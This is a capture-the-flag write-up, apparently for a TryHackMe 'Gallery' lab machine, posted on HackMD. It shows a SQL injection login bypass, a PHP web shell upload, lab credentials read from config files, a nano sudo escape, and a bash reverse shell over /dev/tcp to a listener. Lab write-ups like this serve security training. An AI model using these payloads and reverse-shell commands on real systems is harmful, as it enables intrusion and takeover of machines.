Try   HackMD

Enumeration

First run up Nmap and got two ports open , that is port 80 and port 8080 , and I answer the question, asking about ports.

# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds

Decided to open port 80 on my browser and it gave out apache server homepage :

Now I open up , the other port 8080 , which is a proxy , and it redirects me to https://ip/gallery/ which has a login page:

Initial Access & Foothold

So on the login page, I try SQLi with the payload : admin ' or 1=1 limit 1-- +' and I was able to login as administrator :

Looking around the dashbord I found an upload field on the profile settings, so I uploaded the file captured the request , and then edited the file contents , to a simple web shell:

[tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)

And now time to pop shell :

Now that I have shell, I decided to look for configuration files, and I found config.php but it was importing files from another folder:












<?php
ob_start();
ini_set('date.timezone','Asia/Manila');
date_default_timezone_set('Asia/Manila');
session_start();

require_once('initialize.php');
require_once('classes/DBConnection.php');
require_once('classes/SystemSettings.php');
$db = new DBConnection;
$conn = $db->conn;

I was able to find DBConnection.php from classes folder and it had the following:
































<?php
if(!defined('DB_SERVER')){
    require_once("../initialize.php");
}
class DBConnection{

    private $host = DB_SERVER;
    private $username = DB_USERNAME;
    private $password = DB_PASSWORD;
    private $database = DB_NAME;
    
    public $conn;
    
    public function __construct(){

        if (!isset($this->conn)) {
            
            $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database);
            
            if (!$this->conn) {
                echo 'Cannot connect to database server';
                exit;
            }            
        }    
        
    }
    public function __destruct(){
        $this->conn->close();
    }
}
?>

which means the values of those variables are at initialize.php












<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');

if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>

I was able to get mysql creds , and $dev_data information which seem to be creds for the developer , and there was the username and password as hash, I was able to answer number three by login to mysql and then copying the hash for admin!

First thing I did, was to update the shell, so as it doesn't give those shell errors :





/usr/bin/script -qc /bin/bash /dev/null
[click control+z to background the shell]
stty raw -echo; fg
export TERM=xterm

www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null
<ome_backup$ /usr/bin/script -qc /bin/bash /dev/null
www-data@gallery:/var/backups/mike_home_backup$ ^Z
[1]+  Stopped                 nc -lnvp 1337
[tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg
nc -lnvp 1337
             export TERM=xterm

I was able to update the shell, and as I was checking through /var/backups I was able to see a user's backup folder mike, so I read the history, and I was able to get the password:

www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit

I log in:

www-data@gallery:/var/backups/mike_home_backup$ su mike
Password: 
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents  images  user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}

and there I got the user flag!

Privilege Escalation

I first run sudo -l and I got to see what commands can mike run as root:

mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

I read the file /opt/rootkit.sh:


















#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

From that code we can see when we choose the option read we get to run nano which means we can use nano for privilege escalation:

I can easily get root shell here by typing the following:

^R^X [control+R + control+X]
reset; sh 1>&0 2>&0

and from here now I can type:

/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"

Set a listener on your terminal and boom you have root shell:

[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)

And we have the flag:

root@gallery:/# root
cd root
root@gallery:/root# ls
ls
report.txt
root.txt
root@gallery:/root# cat root.txt
cat root.txt
THM{ba87e0[REDACTED]fde87}

contact : tahaafarooq

Last changed by 
Tahaa Farooq
お前はもう死んでいる
0
3
3742

Read more

UnderPass Hackthebox Writeup

An easy box from HTB, we first get access to daloradius with weak credentials using them to expose a potential user with his hashed (weak) password, I crack the password ending up getting the plaintext password and we use the password to login to the host via SSH! Easy Win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). 🚀

May 10, 2025
Secret Writeup Hackthebox

So found 3 open ports , 22(SSH), 80(HTTP) , 3000(HTTP) with Node.js , Opening port 80 it had a landing page which was titled Dump Docs , and both were also there on port 3000 with a file named files.zip attached which contains the source code of how the api works

Apr 27, 2025
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

Feb 20, 2025
File Transfer Tricks

As a penetration tester, you have happened to gain access to a few target hosts (windows &amp; linux) within the scope of your engagement and you are now required to transfer some files from your host to the target&#39;s host and vise versa, what do you do?

Jan 13, 2025
Read more from Tahaa Farooq
Published on HackMD